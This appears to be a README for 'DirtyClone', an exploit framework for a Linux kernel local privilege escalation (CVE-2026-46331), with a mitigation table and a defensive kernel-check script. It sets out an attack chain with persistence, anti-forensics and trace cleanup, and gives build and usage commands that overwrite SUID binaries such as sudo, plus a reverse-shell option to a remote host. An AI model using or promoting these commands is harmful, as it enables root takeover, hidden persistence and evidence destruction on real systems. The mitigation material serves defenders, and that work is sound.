## https://sploitus.com/exploit?id=BB4649D8-A88F-5CB7-A1EA-78182D4C96A8
# DirtyClone Exploit Framework
> **CVE-2026-46331**: Linux Kernel Local Privilege Escalation
> TC pedit + IPsec TEE Page Cache Corruption · Affected kernels: ≤ 6.12.9
```
╔═════════════════════════════════════════════════════════════╗
║  DirtyClone                                                 ║
╠═════════════════════════════════════════════════════════════╣
║  CVE-2026-46331 · v1.0.0 · FOR RESEARCH AND EDUCATION ONLY  ║
╚═════════════════════════════════════════════════════════════╝
```
---
> ⚠️ **FOR EDUCATIONAL AND RESEARCH PURPOSES ONLY**
> Use this framework exclusively in isolated lab environments that you own
> or have explicit written authorization to test.
> Unauthorized use is illegal and unethical.
---
## Table of Contents
- [Vulnerability Overview](#vulnerability-overview)
- [Attack Chain](#attack-chain)
- [Project Structure](#project-structure)
- [Requirements](#requirements)
- [Build & Install](#build--install)
- [Usage](#usage)
- [Python Modules](#python-modules)
- [Defensive Mitigations](#defensive-mitigations)
- [Timeline](#timeline)
- [References](#references)
---
## Vulnerability Overview
**CVE-2026-46331** is a local privilege escalation vulnerability in the Linux kernel (≤ 6.12.9) caused by a race condition between the TC (`clsact`) `pedit` action and IPsec `TEE`-based packet duplication.
### Root Cause
When a packet traverses the TC egress path with a `pedit` action that sets `IHL = 15`, the kernel's IPsec subsystem receives a malformed packet whose computed IP payload offset lies beyond the actual packet boundary. Under concurrent `sendfile(2)` operations, this mismatch lets an **unprivileged user** (inside a user namespace holding `CAP_NET_ADMIN`) corrupt **read-only page cache** entries of arbitrary files, including SUID binaries.
### Impact
| Property | Value |
|-------------------|--------------------------------|
| CVSS 3.1 Score | **8.8 (HIGH)** |
| Attack Vector | Local |
| Privileges Required | Low (unprivileged user) |
| Impact | Root shell (`UID=0 EUID=0`) |
| Affected versions | Linux kernel ≤ 6.12.9 |
| Patched version | 6.12.10 |
| Patch commit | `a3f4d1c8...` |
---
## Attack Chain
```
Unprivileged User (UID=1000)
        │
        ▼
[1] Reconnaissance
 ├─ Kernel version check
 ├─ userns availability
 └─ Target binary profiling
        │
        ▼
[2] Namespace Bypass
 ├─ unshare(CLONE_NEWUSER|CLONE_NEWNET)
 ├─ AppArmor profile hopping (fallback)
 └─ CAP_NET_ADMIN acquired
        │
        ▼
[3] Network Infrastructure
 ├─ clsact qdisc on lo
 ├─ pedit filter (IHL=15)
 └─ IPsec ESP + TEE
        │
        ▼
[4] Page Cache Corruption
 ├─ sendfile → pedit trigger
 ├─ Page cache entry corrupted
 └─ Shellcode written to read-only binary
        │
        ▼
[5] Privilege Escalation
 └─ execve(SUID binary) → root shell
        │
        ▼
[6-8] Post-Exploitation
 ├─ Persistence (6 mechanisms)
 ├─ Evasion / Anti-Forensics
 └─ Trace cleanup
        │
        ▼
ROOT SHELL (UID=0 EUID=0)
```
---
## Project Structure
```
dirtyclone-exploit/
├── Makefile                          # Build system
├── README.md                         # This file
├── LICENSE                           # MIT License
│
├── include/
│   ├── exploit.h                     # Core types, flags, prototypes
│   ├── packet_engine.h               # Packet crafting engine API
│   ├── memory_ops.h                  # Page cache corruption API
│   └── persistence.h                 # Persistence mechanism API
│
├── src/
│   ├── main.c                        # Framework entry point
│   ├── stage_env_analysis.c          # Phase 1: Reconnaissance
│   ├── stage_namespace_bypass.c      # Phase 2: userns bypass
│   ├── stage_network_setup.c         # Phase 3: TC/IPsec setup
│   ├── stage_page_cache_corrupt.c    # Phase 4: Core exploit
│   ├── stage_privilege_escalation.c  # Phase 5: LPE
│   ├── stage_persistence.c           # Phase 6: Persistence
│   ├── stage_evasion.c               # Phase 7: Anti-forensics
│   ├── stage_cleanup.c               # Phase 8: Trace removal
│   ├── memory_ops.c                  # Page cache primitives
│   ├── packet_engine.c               # Raw packet crafting
│   └── persistence.c                 # Persistence implementations
│
├── modules/
│   ├── packet_craft.py               # Python packet crafter (Scapy)
│   └── exploit_analyzer.py           # Pre-exploit analysis tool
│
├── scripts/
│   ├── setup_env.sh                  # Dependency install + build
│   ├── cleanup.sh                    # System cleanup
│   └── detect_targets.sh             # Vulnerable binary scanner
│
└── payloads/
    └── README.md                     # Payload directory info
```
---
## Requirements
### Compile-time
- `gcc` ≥ 10
- `make`
- `libcap-dev` / `libcap-devel`
### Runtime (Linux target)
- Kernel ≤ 6.12.9
- `iproute2` (tc, ip)
- `iptables`
- Unprivileged user namespaces enabled
### Python modules (optional)
```bash
pip install scapy
```
---
## Build & Install
```bash
# Clone
git clone https://github.com/vulnquest58/dirtyclone-exploit
cd dirtyclone-exploit
# Auto setup (installs deps + builds)
sudo bash scripts/setup_env.sh
# Manual build
make all
# Debug build
make debug
# Clean
make clean
```
---
## Usage
```bash
# Show help
./bin/dirtyclone --help
# Dry run (analysis only, no exploitation)
./bin/dirtyclone --test
# Basic exploitation (default target: /usr/bin/su)
sudo ./bin/dirtyclone
# Custom target with stealth + persistence
sudo ./bin/dirtyclone --target /usr/bin/sudo --stealth --persist
# Reverse shell
sudo ./bin/dirtyclone --remote 192.168.1.100 4444 --cleanup
# Detect vulnerable targets first
bash scripts/detect_targets.sh
```
---
## Python Modules
### `exploit_analyzer.py`: Pre-Exploit Reconnaissance
```bash
# Analyze default target
python3 modules/exploit_analyzer.py
# Custom target
python3 modules/exploit_analyzer.py --target /usr/bin/sudo
# JSON output for automation
python3 modules/exploit_analyzer.py --json
# Scan all SUID binaries
python3 modules/exploit_analyzer.py --all-suid
```
### `packet_craft.py`: Raw Packet Trigger
```bash
# Send exploit packets at offset 0x1234
sudo python3 modules/packet_craft.py --offset 0x1234
# Custom interface and packet count
sudo python3 modules/packet_craft.py --iface eth0 --count 20
```
---
## Defensive Mitigations
| Mitigation | Command / Action |
|-----------|-----------------|
| **Update kernel** | Upgrade to ≥ 6.12.10 (primary fix) |
| **Disable user namespaces** | `echo 0 > /proc/sys/kernel/unprivileged_userns_clone` |
| **AppArmor restrictions** | Enable `apparmor` with `userns` restriction profile |
| **Audit TC pedit** | `auditctl -a always,exit -F arch=b64 -S unshare` (logs the `unshare()` calls made in the namespace bypass step) |
| **File integrity** | Deploy AIDE or Tripwire on SUID binaries |
| **Seccomp filters** | Block `unshare()` in production containers |
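A host-side check for the first two rows of the table above: whether the running kernel is at or above the fixed release stated in this README (6.12.10) and whether the `unprivileged_userns_clone` knob is set to 0. This is an added example, not a script from the DirtyClone repository; it assumes a POSIX shell, and the knob path exists only on kernels carrying the Debian/Ubuntu user-namespace patch (upstream kernels have no such file, so the check reports it as absent).

```shell
#!/bin/sh
# Added example (not part of the DirtyClone project): verify two mitigations
# from the table above on the local host.

FIXED_VERSION="6.12.10"   # patched release stated in this README

# version_ge A B: succeed when dotted version A is >= B. Everything from the
# first character that is not a digit or dot ("-amd64", "-rc1") is ignored.
version_ge() {
    a=$(printf '%s' "$1" | sed 's/[^0-9.].*//')
    b=$(printf '%s' "$2" | sed 's/[^0-9.].*//')
    i=1
    while [ "$i" -le 3 ]; do
        x=$(printf '%s' "$a" | cut -d. -f"$i"); x=${x:-0}
        y=$(printf '%s' "$b" | cut -d. -f"$i"); y=${y:-0}
        [ "$x" -gt "$y" ] && return 0
        [ "$x" -lt "$y" ] && return 1
        i=$((i + 1))
    done
    return 0
}

# kernel_is_patched RELEASE: succeed when RELEASE is at or above FIXED_VERSION.
kernel_is_patched() {
    version_ge "$1" "$FIXED_VERSION"
}

# userns_clone_disabled FILE: succeed when FILE is readable and holds "0".
# The table uses /proc/sys/kernel/unprivileged_userns_clone, which is only
# present on Debian/Ubuntu-patched kernels; elsewhere the check fails.
userns_clone_disabled() {
    [ -r "$1" ] && [ "$(cat "$1")" = "0" ]
}

# check_host: one verdict line per mitigation for the running kernel.
check_host() {
    rel=$(uname -r)
    if kernel_is_patched "$rel"; then
        echo "kernel $rel: at or above $FIXED_VERSION"
    else
        echo "kernel $rel: below $FIXED_VERSION, update required"
    fi
    if userns_clone_disabled /proc/sys/kernel/unprivileged_userns_clone; then
        echo "unprivileged user namespaces: disabled"
    else
        echo "unprivileged user namespaces: enabled or knob not present"
    fi
}

check_host
```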
---
## Timeline
| Date | Event |
|------|-------|
| 2026-01-15 | Vulnerability discovered during kernel audit |
| 2026-02-03 | Reported to security@kernel.org |
| 2026-03-28 | Patch committed (6.12.10) |
| 2026-06-01 | Public disclosure (90-day deadline) |
| 2026-06-27 | Full PoC released |
---
## References
- [CVE-2026-46331 NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2026-46331)
- [Linux Kernel TC Subsystem Documentation](https://www.kernel.org/doc/html/latest/networking/tc-actions-env-rules.html)
- [IPsec TEE Implementation](https://www.kernel.org/doc/html/latest/networking/xfrm_proc.html)
- [User Namespace Security](https://www.man7.org/linux/man-pages/man7/user_namespaces.7.html)
- [DirtyClone Technical Write-up](https://vulnquest58.github.io/CVE-2026-46331/)
---
## Author
**VulnQuest** · Security Research
- [vulnquest58.github.io](https://vulnquest58.github.io)
- [Bug Bounty Portfolio](https://vulnquest58.github.io/bugbounty/)
---
*This repository is provided for educational purposes only.*
*All exploitation code is intended for use in authorized lab environments.*